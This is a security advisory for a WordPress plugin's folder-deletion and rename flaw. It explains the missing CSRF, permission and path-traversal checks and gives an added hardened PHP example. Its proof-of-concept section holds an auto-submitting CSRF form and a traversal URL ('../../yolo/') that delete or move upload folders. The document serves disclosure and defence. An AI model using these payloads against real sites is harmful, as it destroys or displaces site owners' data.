Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename
Description
The lack of CSRF, authorisation and path traversal checks in the wp_ajax_del_dir() and wp_ajax_rename_dir() AJAX methods in functions.php makes it possible for an authenticated user with a role as low as subscriber to delete and rename arbitrary folders. CSRF attacks against such authenticated users are also possible, tricking them into performing those malicious actions.
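For comparison, here is what a hardened version of a directory-delete and directory-rename AJAX handler looks like once the three missing checks are in place. This is an added example written for this page, not the plugin's own code and not the fix linked in the References changeset; the function names, the nonce actions (example_del_dir, example_rename_dir), the manage_options capability and the articulate_uploads base folder are assumptions.

```php
<?php
// Added example, not the plugin's code: AJAX handlers with the checks the
// advisory says are missing (CSRF nonce, capability, path containment).

add_action( 'wp_ajax_del_dir', 'example_hardened_del_dir' );
add_action( 'wp_ajax_rename_dir', 'example_hardened_rename_dir' );

/**
 * Resolve a plain folder name against the plugin's upload base and confirm
 * the result stays strictly inside that base. Returns the absolute path,
 * or false when the name is empty, contains separators, or escapes the base.
 */
function example_resolve_inside_uploads( $name ) {
    // Reject anything that is not a single path component: slashes,
    // backslashes and a bare '..' never survive sanitize_file_name() unchanged.
    if ( '' === $name || $name !== sanitize_file_name( $name ) ) {
        return false;
    }
    $upload = wp_upload_dir();
    // Assumed base folder (the advisory names wp-content/uploads/articulate_uploads).
    $base = realpath( trailingslashit( $upload['basedir'] ) . 'articulate_uploads' );
    if ( false === $base ) {
        return false;
    }
    $target = realpath( $base . DIRECTORY_SEPARATOR . $name );
    // realpath() collapses '../' and symlinks, so a prefix test on the resolved
    // path is a reliable containment check. Requiring the separator after the
    // base also refuses the base folder itself (the dir="" case in the PoC).
    if ( false === $target || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }
    return $target;
}

function example_hardened_del_dir() {
    // 1. CSRF: the request must carry a nonce issued for this action.
    check_ajax_referer( 'example_del_dir', 'nonce' );
    // 2. Authorisation: subscribers must never reach this code path.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // 3. Path traversal: only a contained, existing folder may be removed.
    $dir    = isset( $_POST['dir'] ) ? wp_unslash( $_POST['dir'] ) : '';
    $target = example_resolve_inside_uploads( $dir );
    if ( false === $target || ! is_dir( $target ) ) {
        wp_send_json_error( 'folder not found', 404 );
    }
    example_remove_dir( $target );
    wp_send_json_success();
}

function example_hardened_rename_dir() {
    check_ajax_referer( 'example_rename_dir', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    $from = isset( $_POST['dir_name'] ) ? wp_unslash( $_POST['dir_name'] ) : '';
    $to   = isset( $_POST['title'] ) ? wp_unslash( $_POST['title'] ) : '';
    // Both the source and the destination must resolve inside the base; the
    // destination must not exist yet, so validate its parent and name separately.
    $src = example_resolve_inside_uploads( $from );
    if ( false === $src || ! is_dir( $src ) ) {
        wp_send_json_error( 'folder not found', 404 );
    }
    if ( '' === $to || $to !== sanitize_file_name( $to ) ) {
        wp_send_json_error( 'invalid destination name', 400 );
    }
    $dst = dirname( $src ) . DIRECTORY_SEPARATOR . $to;
    if ( file_exists( $dst ) || ! rename( $src, $dst ) ) {
        wp_send_json_error( 'rename failed', 409 );
    }
    wp_send_json_success();
}

/** Recursively remove a directory tree without following symlinks. */
function example_remove_dir( $dir ) {
    foreach ( scandir( $dir ) as $entry ) {
        if ( '.' === $entry || '..' === $entry ) {
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $entry;
        if ( is_dir( $path ) && ! is_link( $path ) ) {
            example_remove_dir( $path );
        } else {
            unlink( $path );
        }
    }
    rmdir( $dir );
}
```

The client side has to send the matching nonce (wp_create_nonce( 'example_del_dir' ) passed as the nonce field), otherwise check_ajax_referer() ends the request before any of the other checks run. The capability is the one a site should tune: manage_options limits the action to administrators, which is the safe default for anything that deletes or moves directories.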
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="del_dir" />
      <input type="hidden" name="dir" value="" />
    </form>
  </body>
</html>

The dir parameter can be changed; for example, using '../' deletes the content of wp-content/uploads.

To rename and move wp-content/uploads/articulate_uploads to wp-content/yolo:

https://<BLOG>/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset?old=2114846&old_path=insert-or-embed-articulate-content-into-wordpress%2Ftrunk%2Ffunctions.php&new=2115820&new_path=insert-or-embed-articulate-content-into-wordpress%2Ftrunk%2Ffunctions.php

Classification

Type MULTI

Miscellaneous

Original Researcher WPScanTeam
Submitter WPScanTeam
Submitter Website https://wpscan.org
Submitter Twitter _WPScan_
Views 1101
Verified Yes
WPVDB ID 9416

Timeline

Publicly Published 2019-07-02
Added 2019-07-02
Last Updated 2019-07-16